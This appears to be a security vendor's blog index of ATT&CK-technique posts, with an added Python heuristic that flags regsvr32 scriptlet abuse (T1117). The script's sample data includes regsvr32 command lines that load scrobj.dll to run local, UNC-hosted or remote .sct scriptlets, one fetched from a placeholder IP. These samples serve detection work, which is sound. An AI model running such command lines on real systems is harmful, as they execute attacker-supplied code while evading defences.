Meet Todd Gaiser: detection engineering extraordinaire

Todd Gaiser is a longtime anti-malware enthusiast, a vintner (in a manner of speaking), and the new director of detection engineering at Red Canary.

FrameworkPOS and the adequate persistent threat

A lot is made of so-called “advanced persistent threats,” but, oftentimes, good enough is good enough—even among sophisticated adversaries.

Adversaries use scripting more than any ATT&CK technique except PowerShell

Scripts provide a versatile mechanism for automating task execution at nearly every phase of an attack. The only real limit on what can be achieved with scripting—whether malicious or legitimate—is your imagination. So it makes perfect sense that scripting (T1064) is the second most prevalent MITRE ATT&CK™ technique among confirmed threats in the environments we monitor.

Four tools to consider if you’re adopting ATT&CK

These four tools are easy to implement, compatible with MITRE ATT&CK, and free, which is why we recommend them to anyone adopting the framework.

Threat analysis: Regsvr32 is the third most popular ATT&CK technique

Trusted by default and not easily disabled, Regsvr32 (T1117) is a favorite technique among adversaries. Both stealthy and practical, it can be used to perform a variety of malicious actions that are difficult to detect or block. All in all, it’s no surprise that we see it so frequently in the environments we monitor.
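As an added example (editorial code, not Red Canary's detection logic or anything from the linked post), the following Python routine scores regsvr32 command lines for the T1117 abuse patterns documented in ATT&CK: loading scrobj.dll (the Windows Script Component runtime), pointing /i: at a remote URL or UNC path, and pairing /u with /i: so the scriptlet runs without leaving a COM registration behind. The sample command lines and the score threshold are constructed for illustration and should be tuned against real telemetry before use.

```python
"""Heuristic triage of regsvr32 command lines for ATT&CK T1117 abuse patterns.

Editorial example; the indicator weights are the editor's, not Red Canary's.
"""
import re

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    r'regsvr32.exe /s C:\Windows\System32\msxml3.dll',
    r'regsvr32 /s /n /u /i:http://198.51.100.7/payload.sct scrobj.dll',
    r'"C:\Windows\System32\regsvr32.exe" /s /i:\\fileserver\share\update.sct scrobj.dll',
    r'regsvr32.exe /u "C:\Program Files\Vendor\plugin.dll"',
    r'regsvr32.exe /s /i:C:\Users\Public\a.sct scrobj.dll',
]

# scrobj.dll handles .sct scriptlets; regsvr32 loading it with an /i: argument
# is the well-known way to execute a scriptlet, including one fetched remotely.
SCROBJ_RE = re.compile(r'(?:^|[\s"\\])scrobj\.dll\b', re.IGNORECASE)
INSTALL_RE = re.compile(r'/i:("?)([^"\s]+)\1', re.IGNORECASE)
FLAG_RE = re.compile(r'(?:^|\s)/([a-z])(?=\s|$|:)', re.IGNORECASE)


def is_regsvr32(cmdline: str) -> bool:
    """True if the image in the first token is regsvr32 (quoted path and .exe optional).

    Assumes the image path contains no spaces, which holds for System32/SysWOW64.
    """
    tokens = cmdline.strip().split()
    if not tokens:
        return False
    image = tokens[0].strip('"').lower().rsplit('\\', 1)[-1]
    return image in ('regsvr32', 'regsvr32.exe')


def analyze(cmdline: str) -> dict:
    """Score one command line; 'suspicious' is True at score >= 3 (illustrative threshold)."""
    if not is_regsvr32(cmdline):
        return {'cmdline': cmdline, 'score': 0, 'indicators': [], 'suspicious': False}

    score = 0
    indicators = []
    flags = {m.group(1).lower() for m in FLAG_RE.finditer(cmdline)}

    if SCROBJ_RE.search(cmdline):
        score += 3
        indicators.append('scrobj.dll')

    match = INSTALL_RE.search(cmdline)
    if match:
        target = match.group(2)
        lowered = target.lower()
        if lowered.startswith(('http://', 'https://', 'ftp://')) or target.startswith('\\\\'):
            score += 3
            indicators.append('remote /i: target')
        elif lowered.endswith('.sct'):
            score += 2
            indicators.append('local scriptlet /i: target')
        if 'u' in flags:
            # /u with /i: calls DllInstall in uninstall mode: the scriptlet still
            # executes, but no COM registration is written to the registry.
            score += 1
            indicators.append('/u with /i:')

    return {'cmdline': cmdline, 'score': score, 'indicators': indicators,
            'suspicious': score >= 3}


def triage(cmdlines) -> list:
    """Return the analyses that crossed the threshold, highest score first."""
    hits = [analyze(c) for c in cmdlines]
    return sorted((h for h in hits if h['suspicious']), key=lambda h: -h['score'])


if __name__ == '__main__':
    for hit in triage(SAMPLE_COMMAND_LINES):
        print(hit['score'], hit['indicators'], hit['cmdline'])
```

Run against the constructed samples, the three scrobj.dll/.sct invocations surface and the two ordinary DLL registrations do not; in production the same logic would sit over process-creation events (Sysmon event 1 or equivalent EDR telemetry) rather than a static list.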

Connection Proxy Ranks Fourth Among ATT&CK Techniques

Testing the Top MITRE ATT&CK Techniques: PowerShell, Scripting, Regsvr32

In this blog, we’re going to walk you through some Atomic Red Team tests that you can run to emulate adversaries and confirm that you are able to detect the types of ATT&CK techniques that have been most prevalent in the environments we monitor.

Spearphishing Ranks Fifth Among ATT&CK Techniques

We’re counting down the top 5 MITRE ATT&CK Techniques according to confirmed threats in the environments we monitor. Number 5 is Spearphishing Attachments.

Threat Hunting in Linux for Indicators of Rocke Cryptojacking

Rocke is a threat actor known for mining cryptocurrency on Linux machines, but it also persists, disables security software, moves laterally, and more.

Getting Started with ATT&CK? New Report Suggests Prioritizing PowerShell

In a newly released report spanning nearly five years and examining some 10,000 confirmed threats, we revealed that PowerShell (T1086) is—by a wide margin—the most prevalent MITRE ATT&CK™ technique that we’ve observed.